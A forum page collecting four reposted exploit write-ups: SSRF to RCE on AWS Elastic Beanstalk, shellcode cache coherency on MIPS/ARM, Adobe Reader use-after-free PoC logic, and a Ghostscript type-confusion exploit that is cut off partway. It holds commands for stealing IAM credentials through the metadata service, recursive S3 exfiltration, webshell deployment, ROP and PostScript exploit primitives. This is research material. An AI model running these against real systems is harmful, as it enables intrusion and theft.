Everything posted by Nytro

  1. Exploiting SSRF in AWS Elastic Beanstalk
February 1, 2019

In this blog, Sunil Yadav, our lead trainer for the “Advanced Web Hacking” training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited to gain access to sensitive data such as the source code. Further, the blog discusses the potential areas which could lead to Remote Code Execution (RCE) on an application deployed on AWS Elastic Beanstalk with a Continuous Deployment (CD) pipeline.

AWS Elastic Beanstalk

AWS Elastic Beanstalk is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby, and Go. It automatically handles deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring.

Provisioning an Environment

AWS Elastic Beanstalk supports Web Server and Worker environment provisioning.

Web Server environment – Typically suited to running a web application or web APIs.
Worker environment – Suited to background jobs and long-running processes.

A new application can be configured by providing some information about the application and environment and uploading the application code in a zip or war file.

Figure 1: Creating an Elastic Beanstalk Environment

When a new environment is provisioned, AWS creates an S3 storage bucket, a security group, and an EC2 instance. It also creates a default instance profile, called aws-elasticbeanstalk-ec2-role, which is mapped to the EC2 instance with default permissions. When the code is deployed from the user's computer, a copy of the source code in a zip file is placed in an S3 bucket named elasticbeanstalk-region-account-id.

Figure 2: Amazon S3 buckets

Elastic Beanstalk doesn’t turn on default encryption for the Amazon S3 bucket that it creates. This means that, by default, objects are stored unencrypted in the bucket (and are accessible only by authorized users).
Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html

Managed policies for the default instance profile, aws-elasticbeanstalk-ec2-role:

AWSElasticBeanstalkWebTier – Grants permissions for the application to upload logs to Amazon S3 and debugging information to AWS X-Ray.
AWSElasticBeanstalkWorkerTier – Grants permissions for log uploads, debugging, metric publication, and worker instance tasks, including queue management, leader election, and periodic tasks.
AWSElasticBeanstalkMulticontainerDocker – Grants permissions for the Amazon Elastic Container Service to coordinate cluster tasks.

The policy “AWSElasticBeanstalkWebTier” allows limited List, Read, and Write permissions on S3 buckets. Buckets are accessible only if the bucket name starts with “elasticbeanstalk-”, and recursive access is also granted.

Figure 3: Managed Policy – “AWSElasticBeanstalkWebTier”

Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html

Analysis

While we were continuing with our regular pentest, we came across an occurrence of a Server-Side Request Forgery (SSRF) vulnerability in the application. The vulnerability was confirmed by making a DNS call to an external domain, and this was further verified by accessing “http://localhost/server-status”, which was configured to be accessible only from localhost, as shown in Figure 4 below.

http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://localhost/server-status

Figure 4: Confirming SSRF by accessing the restricted page

Once SSRF was confirmed, we moved towards confirming that the service provider was Amazon through server fingerprinting using services such as https://ipinfo.io.
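The probe pattern above can be sketched as follows. This is a hypothetical illustration: the target host is a placeholder for the redacted staging domain, and nothing is fetched here; we only build the URLs that the vulnerable "doc" parameter would cause the server to request on our behalf.

```python
# Hypothetical sketch of the SSRF probe. TARGET stands in for the
# redacted staging host from the article; only URL construction is shown.
TARGET = "http://staging.example.com"

def ssrf_url(path):
    """URL that makes the vulnerable endpoint fetch `path` server-side."""
    return f"{TARGET}/view_pospdocument.php?doc={path}"

# The restricted page used to confirm the vulnerability:
probe = ssrf_url("http://localhost/server-status")
```

A DNS-based check (pointing `doc` at an attacker-controlled domain) follows the same shape, with the callback observed out-of-band.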
Thereafter, we tried querying AWS metadata through multiple endpoints, such as:

http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role

We retrieved the account ID and region from the API “http://169.254.169.254/latest/dynamic/instance-identity/document”:

Figure 5: AWS Metadata – Retrieving the Account ID and Region

We then retrieved the Access Key, Secret Access Key, and Token from the API “http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role”:

Figure 6: AWS Metadata – Retrieving the Access Key ID, Secret Access Key, and Token

Note: The IAM security credential of “aws-elasticbeanstalk-ec2-role” indicates that the application is deployed on Elastic Beanstalk.

We then configured the AWS Command Line Interface (CLI), as shown in Figure 7:

Figure 7: Configuring AWS Command Line Interface

The output of the “aws sts get-caller-identity” command indicated that the token was working fine, as shown in Figure 8:

Figure 8: AWS CLI Output: get-caller-identity

So, so far, so good. Pretty standard SSRF exploit, right? This is where it got interesting…

Let’s explore further possibilities

Initially, we tried running multiple commands using the AWS CLI to retrieve information from the AWS instance. However, access to most of the commands was denied due to the security policy in place, as shown in Figure 9 below:

Figure 9: Access denied on ListBuckets operation

We also knew that the managed policy “AWSElasticBeanstalkWebTier” only allows access to S3 buckets whose names start with “elasticbeanstalk”. So, in order to access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an Amazon S3 bucket named elasticbeanstalk-region-account-id. We worked out the bucket name using the information retrieved earlier, as shown in Figure 5.
Region: us-east-2
Account ID: 69XXXXXXXX79

So the bucket name is “elasticbeanstalk-us-east-2-69XXXXXXXX79”.

We listed the bucket's resources recursively using the AWS CLI:

aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/

Figure 10: Listing S3 Bucket for Elastic Beanstalk

We got access to the source code by downloading the S3 resources recursively, as shown in Figure 11:

aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ /home/foobar/awsdata --recursive

Figure 11: Recursively copy all S3 Bucket Data

Pivoting from SSRF to RCE

Now that we had permission to add an object to the S3 bucket, we uploaded a PHP file (webshell101.php, inside a zip file) to the S3 bucket through the AWS CLI to explore the possibility of remote code execution. It didn’t work, as the updated source code was not deployed on the EC2 instance, as shown in Figure 12 and Figure 13:

Figure 12: Uploading a webshell through AWS CLI in the S3 bucket
Figure 13: 404 Error page for Web Shell in the current environment

We took this to our lab to explore some potential exploitation scenarios where this issue could lead us to an RCE. The potential scenarios were:

Using a CI/CD AWS CodePipeline
Rebuilding the existing environment
Cloning from an existing environment
Creating a new environment with an S3 bucket URL

Using CI/CD AWS CodePipeline:

AWS CodePipeline is a CI/CD service which builds, tests, and deploys code every time there is a change in the code (based on the policy). The pipeline supports GitHub, Amazon S3, and AWS CodeCommit as source providers, and multiple deployment providers including Elastic Beanstalk. The AWS official blog on how this works can be found here:

In the case of our application, the software release was automated using AWS CodePipeline, with the S3 bucket as the source repository and Elastic Beanstalk as the deployment provider.
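The bucket-name derivation above is mechanical, so it can be sketched as a small helper. This is a hypothetical convenience function, not part of any AWS SDK; the region and masked account ID match the article's screenshots.

```python
# Elastic Beanstalk's default bucket naming scheme:
#   elasticbeanstalk-<region>-<account-id>
# beanstalk_bucket is a hypothetical helper, not an AWS SDK call.
def beanstalk_bucket(region, account_id):
    return f"elasticbeanstalk-{region}-{account_id}"

bucket = beanstalk_bucket("us-east-2", "69XXXXXXXX79")
# Listing and downloading then becomes (AWS CLI, shown above):
#   aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/
#   aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ ./awsdata --recursive
```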
Let’s first create a pipeline, as seen in Figure 14:

Figure 14: Pipeline settings

Select S3 as the source provider, choose the S3 bucket name, and enter the object key, as shown in Figure 15:

Figure 15: Add source stage

Configure a build provider, or skip the build stage, as shown in Figure 16:

Figure 16: Skip build stage

Add Amazon Elastic Beanstalk as the deploy provider and select an application created with Elastic Beanstalk, as shown in Figure 17:

Figure 17: Add deploy provider

A new pipeline is created, as shown below in Figure 18:

Figure 18: New Pipeline created successfully

Now, it’s time to upload a new file (a webshell) to the S3 bucket in order to execute system-level commands, as shown in Figure 19:

Figure 19: PHP webshell

Add the file to the object configured in the source provider, as shown in Figure 20:

Figure 20: Add webshell in the object

Upload the archive file to the S3 bucket using the AWS CLI, as shown in Figure 21:

aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/

Figure 21: Copy webshell to S3 bucket

The moment the new file is uploaded, CodePipeline immediately starts the build process and, if everything is OK, deploys the code to the Elastic Beanstalk environment, as shown in Figure 22:

Figure 22: Pipeline Triggered

Once the pipeline has completed, we can access the web shell and execute arbitrary commands on the system, as shown in Figure 23:

Figure 23: Running system level commands

And here we got a successful RCE!

Rebuilding the existing environment:

Rebuilding an environment terminates all of its resources, removes them, and creates new resources. So in this scenario, it deploys the latest available source code from the S3 bucket. The latest source code contains the web shell, which gets deployed, as shown in Figure 24.
Figure 24: Rebuilding the existing environment

Once the rebuilding process has completed successfully, we can access our webshell and run system-level commands on the EC2 instance, as shown in Figure 25:

Figure 25: Running system level commands from webshell101.php

Cloning from the existing environment:

If the application owner clones the environment, it again takes the code from the S3 bucket, deploying the application along with the web shell. The cloning process is shown in Figure 26:

Figure 26: Cloning from an existing Environment

Creating a new environment:

While creating a new environment, AWS provides two options for deploying code: uploading an archive file directly, or selecting an existing archive file from an S3 bucket. By selecting the S3 bucket option and providing the S3 bucket URL, the latest source code will be used for deployment. The latest source code contains the web shell, which gets deployed.

References:

https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html
https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html
https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-welcome.html
https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb
https://ipinfo.io

Our Advanced Web Hacking class at Black Hat USA contains this and many more real-world examples. Registration is now open.

Source: https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
  2. Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM
2/5/2019

gdb showing nonsensical crashes

To set the scene: you found a stack buffer overflow, wrote your shellcode to an executable heap or stack, and used your overflow to direct the instruction pointer to the address of your shellcode. Yet your shellcode is inconsistent, crashes frequently, and core dumps show the processor jumped to an address halfway through your shellcode, seemingly without executing the first half. The symptoms haven’t helped diagnose the problem; they’ve left you more confused. You’ve tried everything: changing the size of the buffer, page-aligning your code, even waiting extra cycles, but your code is still broken. When you turn on debug mode for the target process, or step through with a debugger, it works perfectly, but that isn’t good enough. Your code doesn’t self-modify, so you shouldn’t have to worry about cache coherency, right?

We accessed a root console via UART

That’s what happened to us on MIPS when we exploited a TP-Link router. In order to save time, we added a series of NOPs from the beginning of the shellcode buffer to where the processor often “jumped,” and put the issue in the queue to explore later. We encountered a similar problem on ARM when we exploited Devil’s Ivy on an ARM chip. We circumvented the problem by not using self-modifying shellcode, and logged the issue so we could follow up later. Since we finished exploring lateral attacks, the research team has taken some time to dig into the shellcoding oddities that puzzled us earlier, and we’d like to share what we've learned.

MIPS: A Short Explanation and Solution

Overview of MIPS caches

Our MIPS shellcode did not self-modify, but it ran afoul of cache coherency anyway. MIPS maintains two caches, a data cache and an instruction cache. These caches are designed to increase the speed of memory access by conducting reads and writes to main memory asynchronously.
The caches are completely separate: MIPS writes data to the data cache and instructions to the instruction cache. To save time, the running process pulls instructions and data from the caches rather than from main memory. When a value is not available from the cache, the processor syncs the cache with main memory before the process tries again.

When the TP-Link’s MIPS processor wrote our shellcode to the executable heap, it only wrote the shellcode to the data cache, not to main memory. Modified areas in the data cache are marked for later syncing with main memory. However, although the heap was marked executable, the processor didn’t automatically recognize our bytes as code and never updated the instruction cache with our new values. What’s more, even if the instruction cache had synced with main memory before our code ran, it still wouldn’t have received our values, because they had not yet been written from the data cache to main memory. Before our shellcode could run, it needed to move from the data cache to the instruction cache, by way of main memory, and that wasn't happening.

This explained the strange crashes. After our stack buffer overflow overwrote the stored return address with our shellcode address, the processor directed execution to the correct location, because the return address was data. However, it executed the old instructions that still occupied the instruction cache, rather than the ones we had recently written to the data cache. The buffer had previously been filled mostly with zeros, which MIPS interprets as NOPs. Core dumps showed an apparent “jump” to the middle of our shellcode because the processor loaded our values just before, or during, generating the core dump. The processor hadn't synced because it assumed that the instructions that had been at that location would still be at that location, a reasonable assumption given that code does not usually change mid-execution.
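The incoherence described above can be made concrete with a toy model. This is deliberately not real MIPS semantics, just the control flow of the bug: writes land in a write-back data cache, instruction fetch reads a separate, stale instruction cache, and only an explicit sync moves the new bytes through main memory.

```python
# Toy model of split-cache incoherence (not real MIPS semantics).
class ToyCPU:
    def __init__(self):
        self.memory = {0x1000: "nop"}    # heap previously zero-filled (NOPs)
        self.dcache = {}                 # write-back data cache
        self.icache = {0x1000: "nop"}    # old contents already cached

    def write(self, addr, value):
        # e.g. the memcpy that places shellcode on the executable heap:
        # write-back means main memory is NOT updated yet.
        self.dcache[addr] = value

    def fetch(self, addr):
        # what the pipeline actually executes
        return self.icache.get(addr, self.memory[addr])

    def sync(self):
        # what e.g. sleep() ends up causing: dcache write-back to
        # memory, then instruction cache invalidate/refill
        self.memory.update(self.dcache)
        self.icache.clear()
        self.icache.update(self.memory)

cpu = ToyCPU()
cpu.write(0x1000, "shellcode")
stale = cpu.fetch(0x1000)   # still "nop": the old instruction runs
cpu.sync()
fresh = cpu.fetch(0x1000)   # now "shellcode"
```

If execution reaches 0x1000 before the sync, the processor runs the stale NOPs, which is exactly the "jump past the first half of the shellcode" symptom above.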
There are legitimate reasons for modifying code (most importantly, every time a new process loads), so chip manufacturers generally provide ways to flush the data and instruction caches. One easy way to cause a data cache write to main memory is to call sleep(), a well-known strategy which causes the processor to suspend operation for a specified period of time.

Originally our ROP chain consisted of only two addresses: one to calculate the address of the shellcode buffer from two registers we controlled on the stack, and the next to jump to the calculated address. To call sleep(), we inserted two addresses before the original ROP chain. The first code snippet set $a0 to 1. $a0 is the first argument to sleep() and tells the processor how many seconds to sleep. This code also loaded the registers $ra and $s0 from the stack, returning to the value we placed on the stack for $ra.

Setting up call to sleep()

The next code snippet called sleep(). Since sleep() returns to the return address passed into the function, we needed the return address to be something we controlled. We found a location that loaded the return address from the stack and then jumped to a register. We were pleased to find the code snippet below, which transfers the value in $s1, which we set to sleep(), into $t9 and then calls $t9 after loading $ra from the stack.

Calling sleep()

From there, we executed the rest of the ROP chain and finally achieved consistent execution of our exploit. Read on for more details about syncing the MIPS cache and why calling sleep() works, or scroll down for a discussion of ARM cache coherency problems.

In Depth on MIPS Caching

Most of the time when we talk about syncing data, we're trying to avoid race conditions between two entities sharing a data buffer. That is, at a high level, the problem we encountered: essentially a race condition between syncing our shellcode and executing it. If syncing won, the code would work; if execution won, it would fail.
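The extended chain described above (two sleep() gadgets prepended to the original two-address chain) can be sketched as a packed stack payload. Every address here is hypothetical; the real gadgets come from the target's libc, and the stack slots that feed $ra/$s0/$s1 are omitted for brevity.

```python
import struct

# Simplified sketch of the extended ROP chain. All addresses are
# hypothetical placeholders, and big-endian packing is assumed
# (many MIPS routers run big-endian).
SET_A0_1  = 0x2AAB1234  # li $a0,1; load $ra/$s0 from stack; jr $ra
CALL_S1   = 0x2AAB5678  # move $t9,$s1; load $ra from stack; jalr $t9  ($s1 = sleep)
CALC_ADDR = 0x2AAB9ABC  # original gadget: compute shellcode buffer address
JUMP_ADDR = 0x2AABDEF0  # original gadget: jump to the computed address

chain = b"".join(struct.pack(">I", g)
                 for g in (SET_A0_1, CALL_S1, CALC_ADDR, JUMP_ADDR))
```

The point of the layout is ordering: sleep(1) runs (flushing the caches as described below) before the original two gadgets ever touch the shellcode buffer.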
Because the caches do not sync frequently (syncing is a time-consuming process), we almost always lost this race. According to the MIPS Software Training materials (PDF) on caches, whenever we write instructions that the OS would normally write, we need to make the data cache and main memory coherent and then mark the area containing the old instructions in the instruction cache invalid, which is what the OS does every time it loads a new process into memory.

The data and instruction caches store between 8 and 64 KB of values, depending on the MIPS processor. The instruction cache will sync with main memory if the processor encounters a syncing instruction, if execution is directed to a location outside the bounds of what is stored in the instruction cache, and after cache initialization. With a jump to the heap from a library more than a page away, we can be fairly certain that the values there will not be in the instruction cache, but we still need to write the data cache to main memory.

We learned from devttys0 that sleep() would sync the caches. We tried it out and our shellcode worked! We also learned about another option from emaze: calling cacheflush() from libc will more precisely flush the area of memory that you require. However, it requires the address, the number of bytes, and the cache to be flushed as arguments, which is difficult to arrange from ROP. Because calling sleep(), with its single argument, was far easier, we dug a little deeper to find out why it's so effective.

During sleep, a process or thread gives up its allotted time and yields execution to the next scheduled process. However, a context switch on MIPS does not necessitate a cache flush. On older chips it may, but on modern MIPS instruction cache architectures, cached addresses are tagged with an ID corresponding to the process they belong to, so those addresses stay in the cache rather than slowing down the context switch process any further.
Without these IDs, the processor would have to sync the caches during every context switch, which would make context switching even more expensive. So how did sleep() trigger a data cache write-back to main memory?

The two ways data caches are designed to write to main memory are write-back and write-through. Write-through means every memory modification triggers a write out to main memory and the appropriate cache. This ensures data from the cache will not be lost, but greatly slows down processing speed. The other method is write-back, where data is written only to the copy in the cache, and the subsequent write to main memory is postponed for an optimal time. MIPS uses the write-back method (if it didn’t, we wouldn’t have these problems), so we need to wait until the blocks of memory in the cache containing the modified values are written to main memory. This can be triggered in a few different ways.

One trigger is any Direct Memory Access (DMA). Because the processor needs to ensure that the correct bytes are in memory before access occurs, it syncs the data cache with main memory to complete any pending writes to the selected memory. Another trigger is when the data cache requires the cache blocks containing modified values for new memory. As noted before, the data cache size is at least 8 KB, large enough that this should rarely happen. However, during a context switch, if the data cache requires enough new memory that it needs in-use blocks, it will trigger a write-back of modified data, moving our shellcode from the data cache to main memory.

As before, when the sleeping process woke, it caused an instruction cache miss when directing execution to our shellcode, because the address of the shellcode was far from where the processor expected to execute next. This time, our shellcode was in main memory, ready to be loaded into the instruction cache and executed.

Wait, Isn't This a Problem on ARM Too?

It sure is.
ARM maintains separate data and instruction caches too. The difference is that we’re far less likely to find executable heaps and stacks (which were the default on MIPS toolchains until recently). The lack of executable space ready for shellcode forces us to allocate a new buffer, copy our shellcode to it, mark it executable, and then jump to it. Using mprotect to mark a buffer executable triggers a cache flush, according to the Android Hacker’s Handbook. The section also includes an important and very helpful note.

Excerpt from Chapter 9, Separate Code and Instruction Cache, "Android Hacker's Handbook"

However, there are still times we need to sync the instruction cache on ARM, as in the case of exploiting Devil’s Ivy. We put together a ROP chain that gave us code execution and wrote self-modifying shellcode that decoded itself in place, because incoming data was heavily filtered. Although we included code that we thought would sync the instruction cache, the code crashed in the strangest ways. Again, the symptoms were not even close to what we expected. We saw the processor raise a segfault while executing a perfectly good piece of shellcode, a missed register write that caused an incomprehensible crash ten lines of code later, and a socket that connected but would not transmit data. Worse yet, when we attached gdb and went through the code step by step, it worked perfectly. There was no behavior that pointed to an instruction cache issue, and nothing easy to search for help on, other than “Why isn’t my perfectly good shellcode working!?”

By now you can guess what the problem was, and we did too. If you are on ARMv7 or newer and running into odd problems, one solution is to execute data barrier and instruction cache sync instructions after you write, but before you execute, your new bytes, as shown below.

ARMv7+ cache syncing instructions

On ARMv6, instead of DSB and ISB, ARM provided MCR instructions to manipulate the cache.
The following instructions have the same effect as the DSB and ISB above, though prior to ARMv6 they were privileged and so won't work on older chips.

ARMv6 cache syncing instructions

Shellcode to call sleep()

If you are too restricted by a filter to execute these instructions, as we were, neither of these solutions will work. While there are rumors about using SWI 0x9F0002 and overwriting the call number because the system interprets it as data, this method did not work for us and so we can’t recommend it (but feel free to let us know if you tried it and it worked for you). One thing we could do is call mprotect() from libc on the modified shellcode, but an even easier option is to call sleep(), just like we did on MIPS. We ran a series of experiments and determined that calling sleep() caused the caches to sync on ARMv6.

Our shellcode was limited by a filter, so, although we were executing shellcode at this point, we took advantage of functions in libc. We found the address of sleep(), but its lowest byte was below the threshold of the filter. We added 0x20 to the address (the lowest byte allowed) to pass it through the filter, and subtracted it again in our shellcode, as shown to the right.

Although context switches don't directly cause cache invalidation, we suspect that the next process to execute often uses enough of the instruction cache that it requires blocks belonging to the sleeping process. The technique worked well on this processor and platform, but if it doesn’t work for you, we recommend using mprotect() for higher certainty.

Conclusion

The way systems work in theory is not necessarily what happens in the real world. While chips have been designed to prevent additional overhead during context switches, no system runs in precisely the way it was intended. We had fun digging into these issues. Diagnosing computer problems reminds us how difficult it can be to diagnose health conditions.
Symptoms show up in a different location than their cause, like pain referred from one part of the leg to another, and simply observing the problem can change its behavior. Embedded devices were designed to be black boxes, telling us nothing and quietly going about the one task they were designed to do. With more insight into their behavior, we can begin to solve the security problems that confound us.

Just getting started in security? Check out the recent video series on the fundamentals of device security. Old hand? Try our team's research on lateral attacks, the vulnerability our ARM work was based on, and the MIPS-based router vulnerability.

Source: https://blog.senr.io/blog/why-is-my-perfectly-good-shellcode-not-working-cache-coherency-on-mips-and-arm
  3. Using the Weblinks API to Reach JavaScript UAFs in Adobe Reader
February 06, 2019 | Abdul-Aziz Hariri

JavaScript vulnerabilities in Adobe Acrobat/Reader are getting fewer and fewer. I credit this to the “boom” that happened back in 2015 and 2016. Back then, a lot of Adobe Acrobat research emerged, ranging from JavaScript API bypasses to the classic memory corruption style vulnerabilities (i.e. Use-After-Free, Type Confusion, Heap/Stack Overflows, etc.). In fact, in 2015, ZDI disclosed 97 vulnerabilities affecting Adobe Acrobat/Reader, with almost 90% of them affecting the JavaScript API. 2016 saw a slight increase, totaling 110 vulnerabilities, with almost the same percentage of JavaScript vulnerabilities. Most of the vulnerabilities targeted non-privileged JavaScript APIs.

For those who are not familiar with Adobe Acrobat/Reader’s JavaScript API, the first thing you should know is that the JavaScript engine is a fork of Mozilla’s SpiderMonkey. Second, Adobe has a privilege architecture similar to SpiderMonkey's. There are two privilege contexts: privileged and non-privileged. This in turn splits the JavaScript APIs into two groups: privileged APIs and non-privileged APIs. That said, it’s worth noting that probably 90-95% of the corruption vulnerabilities affecting the JavaScript APIs over the past couple of years mainly targeted non-privileged APIs. That still leaves us with a huge pool of non-audited, non-fuzzed, non-touched privileged APIs. That’s perfectly understandable, since auditing privileged APIs is more involved. It also requires a JavaScript privileges API bypass vulnerability to trigger and weaponize them. In other words, it’s more expensive. Thus, most of the big numbers heard around public research on how someone found tens or hundreds of vulnerabilities in Acrobat/Reader are mostly (if not ALL) image parsing vulnerabilities.
It’s smart, if you ask me, but if you think that makes you hardcore, then we’re waiting for you at Pwn2Own, with your favorite image parsing bug weaponized and all of your Adobe CVEs on the back of your T-shirt, of course.

Trolling aside, we do still get some JavaScript vulnerabilities every now and then. Slapping this.closeDoc into APIs for UAFs does not work anymore, as far as I can tell. Well, at least for non-privileged APIs. New JavaScript UAFs have been a little more elegant, though they still follow the same logic. For example, ZDI-18-1393, ZDI-18-1391, and ZDI-18-1394. While all three vulnerabilities are Use-After-Free vulnerabilities, the logic is interesting.

First, all of these are vulnerabilities that affected WebLinks. Links in Adobe Acrobat are generally handled inside the WebLinks.api plugin. There’s a set of JavaScript APIs exposed to handle links. For example, the this.addLink API (where this is the Doc object) accepts two arguments and is used to add a new link to the specified page with the specified coordinates. Here’s a code example:

Another API that is quite useful, as it forces the Link object to be freed *wink*, is the this.removeLinks API. As the name implies, it removes all the links on the specified page within the specified coordinates. Here’s its code example:

So how do these APIs relate to the bugs I mentioned? Simple: create a Link with addLink, force the Link to be freed with removeLinks, and finally re-use it somehow. Well, it’s not that simple, but the logic is right for all of these bugs. Here’s a breakdown of the PoCs…

ZDI-18-1393: The PoC defines an array. It then defines a getter for the first element. The getter’s callback function calls a function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the borderColor attribute set to the array defined earlier.

ZDI-18-1391: The PoC defines an object named “mode”.
It then defines a custom toString function which calls a function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the highlightMode attribute set to the object defined earlier.

ZDI-18-1394: The PoC defines a variable named “width”. It then defines a custom valueOf function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the borderWidth attribute set to the variable defined earlier.

Conclusion

Although a lot of the non-privileged APIs have been heavily audited, there are still different methods that can yield good results. Don’t forget that there’s still a huge attack surface waiting to be audited underneath the privileged APIs. Regardless, some more ingredients are required to reach those APIs (API restriction bypasses). Even that can be challenging to defeat with the recent restriction mitigations that Adobe rolled into Acrobat/Reader.

That’s it for today, folks. Until next time, you can find me on Twitter at @AbdHariri, and follow the team for the latest in exploit techniques and security patches.

Source: https://www.zerodayinitiative.com/blog/2019/2/6/using-the-weblinks-api-to-reach-javascript-uafs-in-adobe-reader
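The three PoCs described in the post above share one control-flow shape: an attacker-supplied callback (getter, toString, or valueOf) fires while addLink is still reading its arguments, and the callback frees the very Link being set up. That shape can be simulated outside Acrobat; the sketch below is plain Python standing in for Acrobat's JavaScript Doc API, so every class and method here is a hypothetical stand-in, not the real API.

```python
# Simulation of the free-then-reuse trigger pattern (hypothetical
# stand-ins for Acrobat's this.addLink / this.removeLinks).
freed = []

class Doc:
    def __init__(self):
        self.links = []

    def remove_links(self):
        freed.extend(self.links)    # "free" every link on the page
        self.links.clear()

    def add_link(self, get_border_color):
        link = object()
        self.links.append(link)
        color = get_border_color()  # attacker callback runs mid-operation...
        return link, color          # ...and the "freed" link is still used

doc = Doc()
doc.links.append("existing-link")
# The callback mimics the getter/toString/valueOf trick: it frees the
# links, then yields an innocuous value for the attribute.
link, _ = doc.add_link(lambda: doc.remove_links() or "red")
dangling = link in freed            # we now hold a reference to a freed object
```

In Acrobat the analogous dangling reference is a real heap pointer, which is what makes the pattern a Use-After-Free rather than a harmless stale reference.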
  4. Exploiting CVE-2018-19134: remote code execution through type confusion in Ghostscript
February 05, 2019
Posted by Man Yue Mo

In this post I'll show how to construct an arbitrary code execution exploit for CVE-2018-19134, a vulnerability caused by type confusion. I discovered CVE-2018-19134 (alongside 3 other CVEs in Ghostscript) back in November 2018. If you'd like to know more about how I used our QL technology to perform variant analysis in order to find these vulnerabilities (and how you can do so yourself!), please have a look at my previous blog post.

The vulnerability

Let's first briefly recap the vulnerability. Recall that PostScript objects are represented as the type ref_s (or more commonly ref, which is a typedef of ref_s):

    struct ref_s {
        struct tas_s tas;
        union v {
            ps_int intval;
            ...
            uint64_t dummy;
        } value;
    };

This is a 16-byte structure in which tas_s occupies the first 8 bytes, containing the type information as well as the size for array, string, dictionary, etc.:

    struct tas_s {
        ushort type_attrs;
        ushort _pad;
        uint32_t rsize;
    };

The vulnerability I found is the result of a missing type check in the function zsetcolor: the type of pPatInst was not checked before interpreting it as a gs_pattern_instance_t.

    static int zsetcolor(i_ctx_t * i_ctx_p)
    {
        ...
        if ((n_comps = cs_num_components(pcs)) < 0) {
            n_comps = -n_comps;
            if (r_has_type(op, t_dictionary)) {
                ref *pImpl, pPatInst;

                if ((code = dict_find_string(op, "Implementation", &pImpl)) < 0)
                    return code;
                if (code > 0) {
                    code = array_get(imemory, pImpl, 0, &pPatInst); //<--- Reported by Tavis Ormandy
                    if (code < 0)
                        return code;
                    cc.pattern = r_ptr(&pPatInst, gs_pattern_instance_t); //<--- What's the type of &pPatInst?!
                    n_numeric_comps = (pattern_instance_uses_base_space(cc.pattern)
                                           ? n_comps - 1 : 0);

Here, r_ptr is a macro in iref.h:

    #define r_ptr(rp,typ) ((typ *)((rp)->value.pstruct))

The value of pstruct originates from PostScript, and is therefore controlled by the user.
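The offsets that make this confusion work can be sanity-checked with a quick layout calculation. This is a sketch assuming a 64-bit build (hence the 8-byte value union); the format strings mirror the two struct definitions above.

```python
import struct

# Layout check for the confusion: ref_s is tas_s (8 bytes) followed by
# an 8-byte value union, so value.pstruct sits at offset 8. That is
# also the offset of ->type in gs_pattern_instance_t, which is what
# lets a 16-byte ref overlay the start of a fake pattern instance.
TAS_FMT = "<HHI"   # ushort type_attrs; ushort _pad; uint32_t rsize
REF_FMT = "<HHIQ"  # tas_s followed by the 8-byte value union

assert struct.calcsize(TAS_FMT) == 8
assert struct.calcsize(REF_FMT) == 16

# A ref whose value.pstruct is 0x41, as produced by
#   << /Implementation [16#41] >> setpattern
fake_ref = struct.pack(REF_FMT, 0, 0, 0, 0x41)
value_offset = struct.calcsize(TAS_FMT)  # == 8
```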
For example, the following input to setpattern (which calls zsetcolor under the hood) will result in pPatInst.value.pstruct evaluating to 0x41.

<< /Implementation [16#41] >> setpattern

Following the code into pattern_instance_uses_base_space, I see that the object that I control is now the pointer pinst, which the code interprets as a gs_pattern_instance_t pointer:

pattern_instance_uses_base_space(const gs_pattern_instance_t * pinst)
{
    return pinst->type->procs.uses_base_space(
        pinst->type->procs.get_pattern(pinst)
    );
}

So it looks like I may be able to control a number of function pointers: get_pattern, uses_base_space, and pinst.

Creating a fake object

Let's see exactly how much of pinst is under my control. The PostScript type array is particularly useful here, as its value stores a ref pointer that points to the start of a ref array. This allows me to create a buffer pointed to by value, whose contents I can control. In the above, a grey box indicates data that I have partial control of (I cannot control type_attrs and _pad in tas completely); green indicates the data that I have complete control of.

The crucial point here is that both value in a ref and type in a gs_pattern_instance_t have an offset of 8 bytes. This means that procs in pinst->type->procs will be the underlying PostScript array that is partially under my control. It turns out that I can indeed control both the function pointers get_pattern and uses_base_space by using nested arrays:

GS><</Implementation [[16#41 [16#51 16#52]]] >> setpattern

This sets pinst to the array [16#41 [16#51 16#52]] and shows that I indeed have full control over both uses_base_space and get_pattern. The next step: how do I use an arbitrary function pointer to achieve code execution?

8 bytes off an easy exploit

I decided to start with getting any valid function pointer. In Ghostscript, built-in PostScript operators are represented by the type t_operator.
As a ref, its value is an op_proc_t, which is a function pointer. These can be reached by getting the operators off the systemdict by their name:

GS>systemdict /put get ==
GS>--put--

So let's try to put some built-in functions in our fake array:

/arr 100 array def
systemdict /put get arr exch 1 exch put
systemdict /get get arr exch 0 exch put
<</Implementation [[16#41 arr]] >> setpattern

I'll be using the following PostScript instructions rather a lot: systemdict <foo> get <arr> exch <idx> exch put. This fetches foo from systemdict and stores it in array arr at index idx. There may exist a better way of achieving that, but keep in mind that I've never written a line of PostScript before I found these vulnerabilities, so please bear with me.

